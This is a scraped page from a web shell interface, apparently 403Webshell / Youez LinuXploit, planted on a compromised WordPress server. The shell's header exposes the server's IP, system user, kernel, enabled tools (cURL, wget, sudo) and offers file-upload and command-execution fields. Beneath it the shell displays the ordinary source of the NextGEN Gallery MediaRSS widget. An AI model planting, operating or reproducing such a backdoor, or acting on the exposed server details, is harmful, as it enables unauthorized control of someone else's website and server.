403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.24
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/rhodeworks/wp-content/plugins/nextgen-gallery/src/Widget/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/rhodeworks/wp-content/plugins/nextgen-gallery/src/Widget/MediaRSS.php
<?php

namespace Imagely\NGG\Widget;

use Imagely\NGG\Display\View;
use Imagely\NGG\Settings\Settings;

class MediaRSS extends \WP_Widget {

	public $options;

	public function __construct() {
		$widget_ops = [
			'classname'   => 'ngg_mrssw',
			'description' => \__( 'Widget that displays Media RSS links for NextGEN Gallery.', 'nggallery' ),
		];
		parent::__construct( 'ngg-mrssw', \__( 'NextGEN Media RSS', 'nggallery' ), $widget_ops );
	}

	/**
	 * @param array $instance
	 */
	public function form( $instance ) {
		// Default settings.
		$instance = \wp_parse_args(
			(array) $instance,
			[
				'mrss_text'        => \__( 'Media RSS', 'nggallery' ),
				'mrss_title'       => \__( 'Link to the main image feed', 'nggallery' ),
				'show_global_mrss' => true,
				'show_icon'        => true,
				'title'            => 'Media RSS',
			]
		);

		$view = new View(
			'Widget/Form/MediaRSS',
			[
				'self'       => $this,
				'instance'   => $instance,
				'title'      => \esc_attr( $instance['title'] ),
				'mrss_text'  => \esc_attr( $instance['mrss_text'] ),
				'mrss_title' => \esc_attr( $instance['mrss_title'] ),
			],
			'photocrati-widget#form_mediarss'
		);

		return $view->render();
	}

	/**
	 * @param array $new_instance
	 * @param array $old_instance
	 * @return array
	 */
	public function update( $new_instance, $old_instance ) {
		$instance                     = $old_instance;
		$instance['title']            = esc_attr( $new_instance['title'] );
		$instance['show_global_mrss'] = $new_instance['show_global_mrss'];
		$instance['show_icon']        = $new_instance['show_icon'];
		$instance['mrss_text']        = esc_attr( $new_instance['mrss_text'] );
		$instance['mrss_title']       = esc_attr( $new_instance['mrss_title'] );

		return $instance;
	}

	/**
	 * @param array $args
	 * @param array $instance
	 */
	public function widget( $args, $instance ) {
		// these are handled by extract() but I want to silence my IDE warnings that these vars don't exist.
		$before_widget = null;
		$before_title  = null;
		$after_widget  = null;
		$after_title   = null;
		$widget_id     = null;

		\extract( $args );

		$title = apply_filters( 'widget_title', empty( $instance['title'] ) ? '&nbsp;' : $instance['title'], $instance, $this->id_base );

		$view = new View(
			'Widget/Display/MediaRSS',
			[
				'self'          => $this,
				'instance'      => $instance,
				'title'         => $title,
				'settings'      => Settings::get_instance(),
				'before_widget' => $before_widget,
				'before_title'  => $before_title,
				'after_widget'  => $after_widget,
				'after_title'   => $after_title,
				'widget_id'     => $widget_id,
			],
			'photocrati-widget#display_mediarss'
		);

		$view->render();
	}

	/**
	 * @param $mrss_url
	 * @param bool     $show_icon
	 * @param string   $title
	 * @param string   $text
	 * @return string
	 */
	public function get_mrss_link( $mrss_url, $show_icon = true, $title = '', $text = '' ) {
		$out = '';

		if ( $show_icon ) {
			$icon_url = NGGALLERY_URLPATH . 'images/mrss-icon.gif';
			$out     .= "<a href='". \esc_url( $mrss_url ) ."' title='" . \esc_attr( $title ) . "' class='ngg-media-rss-link'>";
			$out     .= "<img src='". \esc_url( $icon_url ) ."' alt='MediaRSS Icon' title='" . \esc_attr( $title ) . "' class='ngg-media-rss-icon' />";
			$out     .= '</a> ';
		}

		if ( '' !== $text ) {
			$out .= "<a href='". \esc_url( $mrss_url ) ."' title='" . \esc_attr( $title ) . "' class='ngg-media-rss-link'>";
			$out .= \esc_attr( $text );
			$out .= '</a>';
		}

		return $out;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit